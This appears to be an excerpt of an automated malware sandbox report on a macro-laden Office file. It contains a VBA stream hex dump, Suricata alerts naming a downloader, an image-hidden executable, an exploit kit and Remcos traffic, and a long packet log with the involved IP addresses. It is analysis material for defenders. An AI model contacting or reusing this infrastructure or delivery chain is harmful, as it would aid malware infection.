                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                  CLSID:
                  File Type:data
                  Stream Size:553
                  Entropy:6.350888072320283
                  Base64 Encoded:True
                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . b . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 62 04 b4 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                  2024-07-26T13:09:04.026573+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa4917480192.168.2.22178.237.33.50
                  2024-07-26T13:08:58.500549+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image8049171198.46.176.133192.168.2.22
                  2024-07-26T13:08:59.714462+0200TCP2020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M18049172192.3.176.174192.168.2.22
                  2024-07-26T13:08:57.397604+0200TCP2047750ET MALWARE Base64 Encoded MZ In Image8049171198.46.176.133192.168.2.22
                  2024-07-26T13:09:01.750905+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection4917314645192.168.2.22194.187.251.115

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 26, 2024 13:08:44.026148081 CEST4916580192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:44.031152964 CEST8049165188.114.96.3192.168.2.22
                  Jul 26, 2024 13:08:44.031227112 CEST4916580192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:44.031326056 CEST4916580192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:44.036349058 CEST8049165188.114.96.3192.168.2.22
                  Jul 26, 2024 13:08:45.200596094 CEST8049165188.114.96.3192.168.2.22
                  Jul 26, 2024 13:08:45.200822115 CEST4916580192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:45.206018925 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.211110115 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.211175919 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.211235046 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.216552973 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.694180012 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.694345951 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.694797993 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.694847107 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.694859028 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.694892883 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.697230101 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.697247982 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.697293997 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.700047970 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.700064898 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.700117111 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.702858925 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.702874899 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.702897072 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.702925920 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.705760956 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.705811024 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.705840111 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.705884933 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.705909014 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.705959082 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.783070087 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.783138037 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.783607960 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.783647060 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.783657074 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.783689976 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.786102057 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.786139011 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.786155939 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.786185980 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.788657904 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.788692951 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.788722992 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.788744926 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.791430950 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.791465998 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.791492939 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.791523933 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.794194937 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.794229984 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.794243097 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.794279099 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.796437979 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.796472073 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.796514988 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.796514988 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.798685074 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.798726082 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.798742056 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.798758984 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.798768044 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.798810959 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.800920010 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.800956011 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.800971031 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.800998926 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.803172112 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.803208113 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.803232908 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.803255081 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.805366993 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.805402040 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.805419922 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.805448055 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.871998072 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.872090101 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.872476101 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.872504950 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.872519016 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.872539997 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.874584913 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.874602079 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.874630928 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.874654055 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.876764059 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.876780033 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.876806021 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.876828909 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.879110098 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.879128933 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.879144907 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.879153967 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.879182100 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.879182100 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.881485939 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.881503105 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.881546974 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.883955956 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.883982897 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.884016037 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.884032011 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.885739088 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.885755062 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.885809898 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.887722969 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.887742043 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.887761116 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.887772083 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.887784958 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.887820005 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.889564991 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.889585018 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.889600992 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.889616013 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.891457081 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.891477108 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.891503096 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.891511917 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.893366098 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.893412113 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.893423080 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.893452883 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.893471956 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.893513918 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.895204067 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.895243883 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.895265102 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.895287037 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.897073030 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.897114992 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.897131920 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.897161007 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.898854017 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.898893118 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.898909092 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.898935080 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.900631905 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.900674105 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.900687933 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.900726080 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.900741100 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.900783062 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:45.902348042 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:45.902391911 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:46.010817051 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:46.016011953 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:46.016123056 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:46.016673088 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:46.016705990 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:46.016729116 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:46.016755104 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:46.533020973 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:46.538212061 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:46.538289070 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:46.836004972 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:46.841109991 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:47.108252048 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:47.108314991 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:47.367516041 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:47.372504950 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:47.515921116 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:47.516063929 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:47.524637938 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:47.529505014 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:47.677181959 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:47.677242994 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:47.747106075 CEST4916880192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:47.752055883 CEST8049168188.114.96.3192.168.2.22
                  Jul 26, 2024 13:08:47.752140045 CEST4916880192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:47.752281904 CEST4916880192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:47.757328987 CEST8049168188.114.96.3192.168.2.22
                  Jul 26, 2024 13:08:48.301784039 CEST8049168188.114.96.3192.168.2.22
                  Jul 26, 2024 13:08:48.512942076 CEST4916880192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:48.514794111 CEST8049168188.114.96.3192.168.2.22
                  Jul 26, 2024 13:08:48.514862061 CEST4916880192.168.2.22188.114.96.3
                  Jul 26, 2024 13:08:50.687618017 CEST8049166192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:50.687736988 CEST4916680192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:51.727361917 CEST4916980192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:51.733822107 CEST8049169188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:51.733900070 CEST4916980192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:51.734004974 CEST4916980192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:51.739509106 CEST8049169188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:52.280599117 CEST8049169188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:52.411298037 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:52.416404009 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:52.490962029 CEST4916980192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:52.496649981 CEST8049169188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:52.496726990 CEST4916980192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:52.580640078 CEST8049167188.114.97.3192.168.2.22
                  Jul 26, 2024 13:08:52.580712080 CEST4916780192.168.2.22188.114.97.3
                  Jul 26, 2024 13:08:53.043481112 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.071974993 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.072043896 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.072285891 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.077928066 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.571343899 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.571564913 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.571603060 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.571696997 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.571743965 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.573201895 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.573237896 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.573288918 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.575146914 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.575184107 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.575238943 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.576875925 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.576910973 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.576967955 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.578710079 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.578752041 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.578787088 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.578804016 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.578830004 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.610616922 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.662206888 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.662734985 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.662753105 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.662821054 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.664232969 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.664290905 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.665086031 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.665105104 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.665137053 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.665153980 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.666682005 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.666698933 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.666747093 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.668489933 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.668509960 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.668543100 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.668559074 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.670301914 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.670320034 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.670377970 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.672122955 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.672139883 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.672184944 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.673738956 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.673763990 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.673779011 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.673811913 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.673835039 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.675046921 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.675065994 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.675128937 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.676527977 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.676547050 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.676575899 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.676646948 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.677983999 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.678004026 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.678020954 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.678031921 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.678054094 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.753726959 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.753957033 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.753998041 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.754033089 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.754079103 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.755522966 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.756422043 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.756454945 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.756506920 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.756532907 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.757158041 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.757194042 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.757214069 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.757234097 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.759691000 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.759725094 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.759751081 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.759780884 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.760953903 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.760988951 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.761003017 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.761087894 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.762600899 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.762634039 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.762696028 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.764199018 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.764234066 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.764257908 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.764295101 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.765427113 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.765461922 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.765487909 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.765494108 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.765522003 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.765537977 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.766854048 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.766885996 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.766937971 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.768085957 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.768120050 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.768136978 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.768158913 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.769511938 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.769546986 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.769563913 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.769583941 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.770771980 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.770807028 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.770838976 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.770853043 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.770878077 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.772033930 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.772068977 CEST8049170192.3.176.174192.168.2.22
                  Jul 26, 2024 13:08:53.772082090 CEST4917080192.168.2.22192.3.176.174
                  Jul 26, 2024 13:08:53.772542953 CEST8049170192.3.176.174192.168.2.22
